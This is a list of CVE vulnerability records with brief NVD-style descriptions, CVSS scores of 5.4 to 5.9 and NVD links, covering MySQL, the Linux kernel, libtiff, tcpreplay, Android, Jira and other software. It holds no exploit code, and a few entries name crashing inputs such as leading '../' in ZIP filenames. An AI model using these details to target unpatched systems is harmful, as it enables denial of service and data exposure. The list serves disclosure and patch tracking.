CVE-2021-2011 Vulnerability in the MySQL Client product of Oracle MySQL (component: C API). Supported versions that are affected are 5.7.32 and prior and 8.0.22 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Client. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Client. CVSS 3.1 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H). 5.9 https://nvd.nist.gov/vuln/detail/CVE-2021-2011
CVE-2020-14340 A vulnerability was discovered in XNIO where file descriptor leak caused by growing amounts of NIO Selector file handles between garbage collection cycles. It may allow the attacker to cause a denial of service. It affects XNIO versions 3.6.0.Beta1 through 3.8.1.Final. 5.9 https://nvd.nist.gov/vuln/detail/CVE-2020-14340
CVE-2021-2389 Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.34 and prior and 8.0.25 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H). 5.9 https://nvd.nist.gov/vuln/detail/CVE-2021-2389
CVE-2021-39359 In GNOME libgda through 6.0.0, gda-web-provider.c does not enable TLS certificate verification on the SoupSessionSync objects it creates, leaving users vulnerable to network MITM attacks. NOTE: this is similar to CVE-2016-20011. 5.9 https://nvd.nist.gov/vuln/detail/CVE-2021-39359
CVE-2020-36516 An issue was discovered in the Linux kernel through 5.16.11. The mixed IPID assignment method with the hash-based IPID assignment policy allows an off-path attacker to inject data into a victim's TCP session or terminate that session. 5.9 https://nvd.nist.gov/vuln/detail/CVE-2020-36516
CVE-2022-24769 Moby is an open-source project created by Docker to enable and accelerate software containerization. A bug was found in Moby (Docker Engine) prior to version 20.10.14 where containers were incorrectly started with non-empty inheritable Linux process capabilities, creating an atypical Linux environment and enabling programs with inheritable file capabilities to elevate those capabilities to the permitted set during `execve(2)`. Normally, when executable programs have specified permitted file capabilities, otherwise unprivileged users and processes can execute those programs and gain the specified file capabilities up to the bounding set. Due to this bug, containers which included executable programs with inheritable file capabilities allowed otherwise unprivileged users and processes to additionally gain these inheritable file capabilities up to the container's bounding set. Containers which use Linux users and groups to perform privilege separation inside the container are most directly impacted. This bug did not affect the container security sandbox as the inheritable set never contained more capabilities than were included in the container's bounding set. This bug has been fixed in Moby (Docker Engine) 20.10.14. Running containers should be stopped, deleted, and recreated for the inheritable capabilities to be reset. This fix changes Moby (Docker Engine) behavior such that containers are started with a more typical Linux environment. As a workaround, the entry point of a container can be modified to use a utility like `capsh(1)` to drop inheritable capabilities prior to the primary process starting. 5.9 https://nvd.nist.gov/vuln/detail/CVE-2022-24769
CVE-2022-27906 Mendelson OFTP2 before 1.1 b43 is affected by directory traversal. To access the vulnerable code path, the attacker has to know one of the configured Odette IDs of the OFTP2 server. An attacker can upload files to the server outside of the intended upload directory. 5.9 https://nvd.nist.gov/vuln/detail/CVE-2022-27906
CVE-2020-17522 When ORT (now via atstccfg) generates ip_allow.config files in Apache Traffic Control 3.0.0 to 3.1.0 and 4.0.0 to 4.1.0, those files include permissions that allow bad actors to push arbitrary content into and remove arbitrary content from CDN cache servers. Additionally, these permissions are potentially extended to IP addresses outside the desired range, resulting in them being granted to clients possibly outside the CDN arcitechture. 5.8 https://nvd.nist.gov/vuln/detail/CVE-2020-17522
CVE-2021-41355 .NET Core and Visual Studio Information Disclosure Vulnerability 5.7 https://nvd.nist.gov/vuln/detail/CVE-2021-41355
CVE-2018-17974 An issue was discovered in Tcpreplay 4.3.0 beta1. A heap-based buffer over-read was triggered in the function dlt_en10mb_encode() of the file plugins/dlt_en10mb/en10mb.c, due to inappropriate values in the function memmove(). The length (pktlen + ctx -> l2len) can be larger than source value (packet + ctx->l2len) because the function fails to ensure the length of a packet is valid. This leads to Denial of Service. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2018-17974
CVE-2018-18407 A heap-based buffer over-read was discovered in the tcpreplay-edit binary of Tcpreplay 4.3.0 beta1, during the incremental checksum operation. The issue gets triggered in the function csum_replace4() in incremental_checksum.h, causing a denial of service. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2018-18407
CVE-2019-9209 In Wireshark 2.4.0 to 2.4.12 and 2.6.0 to 2.6.6, the ASN.1 BER and related dissectors could crash. This was addressed in epan/dissectors/packet-ber.c by preventing a buffer overflow associated with excessive digits in time values. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2019-9209
CVE-2020-1753 A security flaw was found in Ansible Engine, all Ansible 2.7.x versions prior to 2.7.17, all Ansible 2.8.x versions prior to 2.8.11 and all Ansible 2.9.x versions prior to 2.9.7, when managing kubernetes using the k8s module. Sensitive parameters such as passwords and tokens are passed to kubectl from the command line, not using an environment variable or an input configuration file. This will disclose passwords and tokens from process list and no_log directive from debug module would not have any effect making these secrets being disclosed on stdout and log files. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2020-1753
CVE-2020-14332 A flaw was found in the Ansible Engine when using module_args. Tasks executed with check mode (--check-mode) do not properly neutralize sensitive data exposed in the event data. This flaw allows unauthorized users to read this data. The highest threat from this vulnerability is to confidentiality. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2020-14332
CVE-2020-9964 A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 14.0 and iPadOS 14.0. A local user may be able to read kernel memory. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2020-9964
CVE-2020-9968 A logic issue was addressed with improved restrictions. This issue is fixed in iOS 14.0 and iPadOS 14.0, macOS Catalina 10.15.7, tvOS 14.0, watchOS 7.0. A malicious application may be able to access restricted files. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2020-9968
CVE-2021-27919 archive/zip in Go 1.16.x before 1.16.1 allows attackers to cause a denial of service (panic) upon attempted use of the Reader.Open API for a ZIP archive in which ../ occurs at the beginning of any filename. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-27919
CVE-2021-29463 Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. An out-of-bounds read was found in Exiv2 versions v0.27.3 and earlier. The out-of-bounds read is triggered when Exiv2 is used to write metadata into a crafted image file. An attacker could potentially exploit the vulnerability to cause a denial of service by crashing Exiv2, if they can trick the victim into running Exiv2 on a crafted image file. Note that this bug is only triggered when writing the metadata, which is a less frequently used Exiv2 operation than reading the metadata. For example, to trigger the bug in the Exiv2 command-line application, you need to add an extra command-line argument such as `insert`. The bug is fixed in version v0.27.4. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-29463
CVE-2021-32613 In radare2 through 5.3.0 there is a double free vulnerability in the pyc parse via a crafted file which can lead to DoS. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-32613
CVE-2021-0561 In append_to_verify_fifo_interleaved_ of stream_encoder.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174302683 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-0561
CVE-2021-3630 An out-of-bounds write vulnerability was found in DjVuLibre in DJVU::DjVuTXT::decode() in DjVuText.cpp via a crafted djvu file which may lead to crash and segmentation fault. This flaw affects DjVuLibre versions prior to 3.5.28. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-3630
CVE-2020-18976 Buffer Overflow in Tcpreplay v4.3.2 allows attackers to cause a Denial of Service via the 'do_checksum' function in 'checksum.c'. It can be triggered by sending a crafted pcap file to the 'tcpreplay-edit' binary. This issue is different than CVE-2019-8381. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2020-18976
CVE-2020-23273 Heap-buffer overflow in the randomize_iparp function in edit_packet.c. of Tcpreplay v4.3.2 allows attackers to cause a denial of service (DOS) via a crafted pcap. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2020-23273
CVE-2021-0706 In startListening of PluginManagerImpl.java, there is a possible way to disable arbitrary app components due to a missing permission check. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-193444889 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-0706
CVE-2021-40985 A stack-based buffer under-read in htmldoc before 1.9.12, allows attackers to cause a denial of service via a crafted BMP image to image_load_bmp. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-40985
CVE-2021-43389 An issue was discovered in the Linux kernel before 5.14.15. There is an array-index-out-of-bounds flaw in the detach_capi_ctr function in drivers/isdn/capi/kcapi.c. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-43389
CVE-2020-23903 A Divide by Zero vulnerability in the function static int read_samples of Speex v1.2 allows attackers to cause a denial of service (DoS) via a crafted WAV file. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2020-23903
CVE-2021-42373 A NULL pointer dereference in Busybox's man applet leads to denial of service when a section name is supplied but no page argument is given 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-42373
CVE-2021-42375 An incorrect handling of a special element in Busybox's ash applet leads to denial of service when processing a crafted shell command, due to the shell mistaking specific characters for reserved characters. This may be used for DoS under rare conditions of filtered command input. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-42375
CVE-2021-42376 A NULL pointer dereference in Busybox's hush applet leads to denial of service when processing a crafted shell command, due to missing validation after a \\x03 delimiter character. This may be used for DoS under very rare conditions of filtered command input. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-42376
CVE-2021-0672 In Browser app, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-199678035 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-0672
CVE-2021-44011 A vulnerability has been identified in JT2Go (All versions < V13.2.0.5), Teamcenter Visualization (All versions < V13.2.0.5). The Jt1001.dll is vulnerable to an out of bounds read past the end of an allocated buffer while parsing specially crafted JT files. An attacker could leverage this vulnerability to leak information in the context of the current process. (ZDI-CAN-15101) 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-44011
CVE-2021-44012 A vulnerability has been identified in JT2Go (All versions < V13.2.0.5), Teamcenter Visualization (All versions < V13.2.0.5). The Jt1001.dll is vulnerable to an out of bounds read past the end of an allocated buffer when parsing specially crafted JT files. An attacker could leverage this vulnerability to leak information in the context of the current process. (ZDI-CAN-15102) 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-44012
CVE-2021-44015 A vulnerability has been identified in JT2Go (All versions < V13.2.0.5), Teamcenter Visualization (All versions < V13.2.0.5). The VCRUNTIME140.dll is vulnerable to an out of bounds read past the end of an allocated buffer when parsing specially crafted CGM files. An attacker could leverage this vulnerability to leak information in the context of the current process. (ZDI-CAN-15109) 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-44015
CVE-2021-44017 A vulnerability has been identified in JT2Go (All versions < V13.2.0.5), Teamcenter Visualization (All versions < V13.2.0.5). The Image.dll is vulnerable to an out of bounds read past the end of an allocated buffer when parsing specially crafted TIF files. An attacker could leverage this vulnerability to leak information in the context of the current process. (ZDI-CAN-15111) 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-44017
CVE-2021-44919 A Null Pointer Dereference vulnerability exists in the gf_sg_vrml_mf_alloc function in gpac 1.1.0-DEV, which causes a segmentation fault and application crash. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-44919
CVE-2021-44926 A null pointer dereference vulnerability exists in gpac 1.1.0-DEV in the gf_node_get_tag function, which causes a segmentation fault and application crash. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-44926
CVE-2021-45942 OpenEXR 3.1.x before 3.1.4 has a heap-based buffer overflow in Imf_3_1::LineCompositeTask::execute (called from IlmThread_3_1::NullThreadPoolProvider::addTask and IlmThread_3_1::ThreadPool::addGlobalTask). NOTE: db217f2 may be inapplicable. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-45942
CVE-2021-45943 GDAL 3.3.0 through 3.4.0 has a heap-based buffer overflow in PCIDSK::CPCIDSKFile::ReadFromFile (called from PCIDSK::CPCIDSKSegment::ReadFromFile and PCIDSK::CPCIDSKBinarySegment::CPCIDSKBinarySegment). 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-45943
CVE-2021-46667 MariaDB before 10.6.5 has a sql_lex.cc integer overflow, leading to an application crash. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-46667
CVE-2022-0534 A vulnerability was found in htmldoc version 1.9.15 where the stack out-of-bounds read takes place in gif_get_code() and occurs when opening a malicious GIF file, which can result in a crash (segmentation fault). 5.5 https://nvd.nist.gov/vuln/detail/CVE-2022-0534
CVE-2021-45386 tcpreplay 4.3.4 has a Reachable Assertion in add_tree_ipv6() at tree.c 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-45386
CVE-2021-45387 tcpreplay 4.3.4 has a Reachable Assertion in add_tree_ipv4() at tree.c. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-45387
CVE-2022-0561 Null source pointer passed as an argument to memcpy() function within TIFFFetchStripThing() in tif_dirread.c in libtiff versions from 3.9.0 to 4.3.0 could lead to Denial of Service via crafted TIFF file. For users that compile libtiff from sources, the fix is available with commit eecb0712. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2022-0561
CVE-2022-0562 Null source pointer passed as an argument to memcpy() function within TIFFReadDirectory() in tif_dirread.c in libtiff versions from 4.0 to 4.3.0 could lead to Denial of Service via crafted TIFF file. For users that compile libtiff from sources, a fix is available with commit 561599c. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2022-0562
CVE-2022-0563 A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2022-0563
CVE-2022-0907 Unchecked Return Value to NULL Pointer Dereference in tiffcrop in libtiff 4.3.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit f2b656e2. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2022-0907
CVE-2022-0908 Null source pointer passed as an argument to memcpy() function within TIFFFetchNormalTag () in tif_dirread.c in libtiff versions up to 4.3.0 could lead to Denial of Service via crafted TIFF file. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2022-0908
CVE-2022-0909 Divide By Zero error in tiffcrop in libtiff 4.3.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit f8d0f9aa. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2022-0909
CVE-2022-0924 Out-of-bounds Read error in tiffcp in libtiff 4.3.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 408976c4. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2022-0924
CVE-2020-25184 Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x stores the password in plaintext in a file that is in the same directory as the executable file. ISaGRAF Runtime reads the file and saves the data in a variable without any additional modification. A local, unauthenticated attacker could compromise the user passwords, resulting in information disclosure. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2020-25184
CVE-2021-4148 A vulnerability was found in the Linux kernel's block_invalidatepage in fs/buffer.c in the filesystem. A missing sanity check may allow a local attacker with user privilege to cause a denial of service (DOS) problem. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-4148
CVE-2021-4149 A vulnerability was found in btrfs_alloc_tree_b in fs/btrfs/extent-tree.c in the Linux kernel due to an improper lock operation in btrfs. In this flaw, a user with a local privilege may cause a denial of service (DOS) due to a deadlock problem. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-4149
CVE-2021-4150 A use-after-free flaw was found in the add_partition in block/partitions/core.c in the Linux kernel. A local attacker with user privileges could cause a denial of service on the system. The issue results from the lack of code cleanup when device_add call fails when adding a partition to the disk. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-4150
CVE-2021-4219 A flaw was found in ImageMagick. The vulnerability occurs due to improper use of open functions and leads to a denial of service. This flaw allows an attacker to crash the system. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-4219
CVE-2022-0854 A memory leak flaw was found in the Linux kernel’s DMA subsystem, in the way a user calls DMA_FROM_DEVICE. This flaw allows a local user to read random memory from the kernel space. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2022-0854
CVE-2022-1052 Heap Buffer Overflow in iterate_chained_fixups in GitHub repository radareorg/radare2 prior to 5.6.6. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2022-1052
CVE-2021-3933 An integer overflow could occur when OpenEXR processes a crafted file on systems where size_t < 64 bits. This could cause an invalid bytesPerLine and maxBytesPerLine value, which could lead to problems with application stability or lead to other attack paths. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-3933
CVE-2021-44768 Delta Electronics CNCSoft (Version 1.01.30) and prior) is vulnerable to an out-of-bounds read while processing a specific project file, which may allow an attacker to disclose information. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-44768
CVE-2022-27938 stb_image.h (aka the stb image loader) 2.19, as used in libsixel and other products, has a reachable assertion in stbi__create_png_image_raw. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2022-27938
CVE-2022-27939 tcprewrite in Tcpreplay 4.4.1 has a reachable assertion in get_layer4_v6 in common/get.c. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2022-27939
CVE-2022-27943 libiberty/rust-demangle.c in GNU GCC 11.2 allows stack consumption in demangle_const, as demonstrated by nm-new. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2022-27943
CVE-2022-27950 In drivers/hid/hid-elo.c in the Linux kernel before 5.16.11, a memory leak exists for a certain hid_parse error condition. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2022-27950
CVE-2015-10002 A vulnerability classified as problematic has been found in Kiddoware Kids Place. This affects the Home Button Protection. A repeated pressing of the button causes a local denial of service. It is recommended to upgrade the affected component. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2015-10002
CVE-2022-1056 Out-of-bounds Read error in tiffcrop in libtiff 4.3.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 46dc8fcd. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2022-1056
CVE-2010-10001 A vulnerability, which was classified as problematic, was found in Shemes GrabIt up to 1.7.2 Beta 4. This affects the component NZB Date Parser. The manipulation of the argument date with the input 1000000000000000 as part of a NZB File leads to a denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2010-10001
CVE-2022-26291 lrzip v0.641 was discovered to contain a multiple concurrency use-after-free between the functions zpaq_decompress_buf() and clear_rulist(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted Irz file. 5.5 https://nvd.nist.gov/vuln/detail/CVE-2022-26291
CVE-2021-39740 In Messaging, there is a possible way to bypass attachment restrictions due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-209965112 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39740
CVE-2021-39742 In Voicemail, there is a possible way to retrieve a trackable identifier due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-186405602 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39742
CVE-2021-39744 In DevicePolicyManager, there is a possible way to determine whether an app is installed, without query permissions, due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-192369136 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39744
CVE-2021-39745 In DevicePolicyManager, there is a possible way to determine whether an app is installed, without query permissions, due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-206127671 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39745
CVE-2021-39747 In Settings Provider, there is a possible way to list values of non-readable global settings due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-208268457 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39747
CVE-2021-39748 In InputMethodEditor, there is a possible way to access some files accessible to Settings due to an unsafe PendingIntent. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-203777141 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39748
CVE-2021-39751 In Settings, there is a possible way to read Bluetooth device names without proper permissions due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-172838801 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39751
CVE-2021-39753 In DomainVerificationService, there is a possible way to access app domain verification information due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-200035185 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39753
CVE-2021-39754 In ContextImpl, there is a possible way to determine whether an app is installed, without query permissions, due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions:Android ID: A-207133709 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39754
CVE-2021-39755 In DevicePolicyManager, there is a possible way to reveal the existence of an installed package without proper query permissions due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-204995407 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39755
CVE-2021-39756 In Framework, there is a possible way to determine whether an app is installed, without query permissions, due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-184354287 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39756
CVE-2021-39757 In PermissionController, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-176094662 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39757
CVE-2021-39760 In AudioService, there is a possible way to determine whether an app is installed, without query permissions, due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-194110526 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39760
CVE-2021-39761 In Media, there is a possible way to determine whether an app is installed, without query permissions, due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-179783181 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39761
CVE-2021-39765 In Gallery, there is a possible permission bypass due to a confused deputy. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-201535427 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39765
CVE-2021-39766 In Settings, there is a possible way to determine whether an app is installed, without query permissions, due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-198296421 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39766
CVE-2021-39769 In Device Policy, there is a possible way to determine whether an app is installed, without query permissions, due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-193663287 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39769
CVE-2021-39770 In Framework, there is a possible disclosure of the device owner package due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-193033501 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39770
CVE-2021-39773 In VpnManagerService, there is a possible disclosure of installed VPN packages due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-191276656 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39773
CVE-2021-39774 In Bluetooth, there is a possible out of bounds read due to a missing bounds check. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-205989472 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39774
CVE-2021-39775 In People, there is a possible way to determine whether an app is installed, without query permissions, due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-206465854 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39775
CVE-2021-39777 In Telephony, there is a possible way to determine whether an app is installed, without query permissions, due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-194743207 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39777
CVE-2021-39778 In Telecomm, there is a possible way to determine whether an app is installed, without query permissions, due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-196406138 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39778
CVE-2021-39779 In getCallStateUsingPackage of Telecom Service, there is a missing permission check. This could lead to local information disclosure of the call state with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-190400974 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39779
CVE-2021-39788 In TelecomManager, there is a possible way to check if a particular self managed phone account was registered on the device due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-191768014 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39788
CVE-2021-39791 In WallpaperManagerService, there is a possible way to determine whether an app is installed, without query permissions, due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-194112606 5.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39791
CVE-2018-10060 Cacti before 1.1.37 has XSS because it does not properly reject unintended characters, related to use of the sanitize_uri function in lib/functions.php. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2018-10060
CVE-2018-10061 Cacti before 1.1.37 has XSS because it makes certain htmlspecialchars calls without the ENT_QUOTES flag (these calls occur when the html_escape function in lib/html.php is not used). 5.4 https://nvd.nist.gov/vuln/detail/CVE-2018-10061
CVE-2019-11025 In clearFilter() in utilities.php in Cacti before 1.2.3, no escaping occurs before printing out the value of the SNMP community string (SNMP Options) in the View poller cache, leading to XSS. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2019-11025
CVE-2020-4021 Affected versions are: Before 8.5.5, and from 8.6.0 before 8.8.1 of Atlassian Jira Server and Data Center allow remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the XML export view. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2020-4021
CVE-2019-20414 Affected versions of Atlassian Jira Server and Data Center allow remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in Issue Navigator Basic Search. The affected versions are before version 7.13.9, and from version 8.0.0 before 8.4.2. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2019-20414
CVE-2020-4024 The attachment download resource in Atlassian Jira Server and Data Center before 8.5.5, and from 8.6.0 before 8.8.2, and from 8.9.0 before 8.9.1 allows remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability issue attachments with a vnd.wap.xhtml+xml content type. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2020-4024
CVE-2020-14173 The file upload feature in Atlassian Jira Server and Data Center in affected versions allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability. The affected versions are before version 8.5.4, from version 8.6.0 before 8.6.2, and from version 8.7.0 before 8.7.1. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2020-14173
CVE-2020-14175 Affected versions of Atlassian Confluence Server and Data Center allow remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability in user macro parameters. The affected versions are before version 7.4.2, and from version 7.5.0 before 7.5.2. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2020-14175
CVE-2020-14410 SDL (Simple DirectMedia Layer) through 2.0.12 has a heap-based buffer over-read in Blit_3or4_to_3or4__inversed_rgb in video/SDL_blit_N.c via a crafted .BMP file. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2020-14410
